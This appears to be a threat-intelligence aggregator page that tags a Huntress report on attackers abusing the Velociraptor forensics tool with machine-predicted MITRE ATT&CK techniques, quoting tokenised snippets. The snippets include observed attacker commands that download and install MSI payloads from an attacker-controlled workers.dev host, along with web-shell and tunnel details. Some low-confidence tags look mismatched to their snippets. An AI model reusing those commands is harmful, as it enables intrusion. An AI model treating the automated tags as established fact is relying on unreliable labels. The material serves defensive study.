TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Velociraptor Misuse, Pt. II: The Eye of the Storm

2025-12-03 · Read original ↗

ATT&CK techniques detected

24 predictions
T1505.003Web Shell
99%
“_ 64 ) + applewebkit / 537. 36 + ( khtml, + like + gecko ) + chrome / 129. 0. 0. 0 + safari / 537. 36 / _ layouts / signout. aspx 200 0 0 455 the toolshell chain details how once authentication is bypassed, attackers chain a second vulnerability for remote code execution ( cve - …”
T1486Data Encrypted for Impact
94%
“a tunnel to an attacker - controlled c2. figure 10 : excerpt from the warlock ransomware note the hostname used by the threat actor in this incident ( desktop - c1n9m ) is the same workstation as one identified in august in a singapore government security advisory. this advisory …”
T1059.001PowerShell
92%
“look at the windows event logs shows an interesting trail of faux pas as the threat actor attempted to install a cloudflare tunnel ( initially unsuccessfully ) and run the openssh server – despite the application appearing to not be installed. threat actor fumbles the threat acto…”
T1190Exploit Public-Facing Application
92%
“- [ redacted ] 443 " - v " v4. 0 " - l " webengine4. dll " - a \ \. \ pipe \ iis … - h " c : \ inetpub \ temp \ apppools \ sharepoint - [ redacted ] 443 \ sharepoint - [ redacted ] 443. config " - w " " - m 0 these detections indicate that the installations likely occurred via a …”
T1190Exploit Public-Facing Application
87%
“vectors - from exploitation via wsus to web shell compromise on sharepoint - however, they all involved the velociraptor tool, and there were several notable similarities in the post - exploitation activities. for instance, the msi files across two incidents came from the same do…”
T1190Exploit Public-Facing Application
81%
“15, the huntress soc identified malicious activity originating directly from a managed service provider ’ s own network. an important note is that huntress had sent an earlier incident report in july to the partner regarding this same sharepoint server. at that time, we observed …”
T1486Data Encrypted for Impact
78%
“, as seen via the binary path from edr telemetry : " c : \ program files \ tightvnc \ tvnserver. exe " - service. the attacker also installed a service called security state check ( securitycheck. exe ). this file ’ s hash is flagged as malicious on virustotal by a considerable n…”
T1569.002Service Execution
76%
“##raptor. these installations were the result of the following commands : msiexec / q / i https : / / royal - boat - bf05. qgtxtebl. workers. dev / ssh. msi msiexec / q / i https : / / royal - boat - bf05. qgtxtebl. workers. dev / v3. msi a timeline created from windows event log…”
T1195.002Compromise Software Supply Chain
74%
“saw the same cloudflare tunnel token account tag, and the same download source for installed msi files, being used across different incidents. - we also saw some techniques used across these three incidents that have been previously documented for attacks involving velociraptor, …”
T1505.003Web Shell
74%
“15, the huntress soc identified malicious activity originating directly from a managed service provider ’ s own network. an important note is that huntress had sent an earlier incident report in july to the partner regarding this same sharepoint server. at that time, we observed …”
T1219Remote Access Tools
66%
“velociraptor misuse, pt. ii : the eye of the storm acknowledgements : special thanks to ben folland, anna pham, michael tigges, and anton ovrutsky for contributing to this investigation and writeup. we recently outlined an incident on november 12 where threat actors exploited a v…”
T1543.003Windows Service
65%
“commands on the host, which they promptly used to run the command illustrated in figure 5. figure 5 : web shell running msiexec to install velociraptor for clarity, the observed command appears as follows : msiexec / q / i https [ : ] / / royal - boat - bf05. qgtxtebl. workers [.…”
T1219Remote Access Tools
61%
“- terms service install > c : \ programdata \ microsoft \ appv \ i1. log type c : \ programdata \ microsoft \ appv \ i1. log here, we see the attacker was downloading visual studio code ( code. exe ) with the intent of establishing a remote tunnel. figure 8 : vs code logs for tun…”
T1190Exploit Public-Facing Application
48%
“velociraptor misuse, pt. ii : the eye of the storm acknowledgements : special thanks to ben folland, anna pham, michael tigges, and anton ovrutsky for contributing to this investigation and writeup. we recently outlined an incident on november 12 where threat actors exploited a v…”
T1071.001Web Protocols
48%
“velociraptor misuse, pt. ii : the eye of the storm acknowledgements : special thanks to ben folland, anna pham, michael tigges, and anton ovrutsky for contributing to this investigation and writeup. we recently outlined an incident on november 12 where threat actors exploited a v…”
T1059.001PowerShell
48%
“on startup as the system user. this is the primary goal for a threat actor post initial access – and in this case they achieved it in one step. with the velociraptor foothold established, the adversary moved to set up a secondary c2 channel for added resilience, which was connect…”
T1505.004IIS Components
38%
“- terms service install > c : \ programdata \ microsoft \ appv \ i1. log type c : \ programdata \ microsoft \ appv \ i1. log here, we see the attacker was downloading visual studio code ( code. exe ) with the intent of establishing a remote tunnel. figure 8 : vs code logs for tun…”
T1486Data Encrypted for Impact
37%
“leave the door open for months. incident 3 - warlock ransomware in early november, huntress was installed by an organization after it had been hit by a warlock ransomware attack. because the agent was installed mid - compromise, our visibility was somewhat limited. however, the i…”
T1572Protocol Tunneling
37%
“of the relevant malicious requests from the sharepoint servers iis logs for this incident below : after using the post requests to install the msi files, the threat actor then logged into the endpoint via rdp, using an account named adminbak2, then installed a cloudflare tunnel, …”
T1195.002Compromise Software Supply Chain
37%
“- terms service install > c : \ programdata \ microsoft \ appv \ i1. log type c : \ programdata \ microsoft \ appv \ i1. log here, we see the attacker was downloading visual studio code ( code. exe ) with the intent of establishing a remote tunnel. figure 8 : vs code logs for tun…”
T1080Taint Shared Content
37%
“a tunnel to an attacker - controlled c2. figure 10 : excerpt from the warlock ransomware note the hostname used by the threat actor in this incident ( desktop - c1n9m ) is the same workstation as one identified in august in a singapore government security advisory. this advisory …”
T1566.004Spearphishing Voice
34%
“- terms service install > c : \ programdata \ microsoft \ appv \ i1. log type c : \ programdata \ microsoft \ appv \ i1. log here, we see the attacker was downloading visual studio code ( code. exe ) with the intent of establishing a remote tunnel. figure 8 : vs code logs for tun…”
T1569.002Service Execution
32%
“, as seen via the binary path from edr telemetry : " c : \ program files \ tightvnc \ tvnserver. exe " - service. the attacker also installed a service called security state check ( securitycheck. exe ). this file ’ s hash is flagged as malicious on virustotal by a considerable n…”
T1543.003Windows Service
30%
“, as seen via the binary path from edr telemetry : " c : \ program files \ tightvnc \ tvnserver. exe " - service. the attacker also installed a service called security state check ( securitycheck. exe ). this file ’ s hash is flagged as malicious on virustotal by a considerable n…”

Summary

Huntress reports an uptick in threat actors abusing the Velociraptor open-source DFIR tool, linked to incidents involving WSUS exploitation, VS Code tunnels, and more.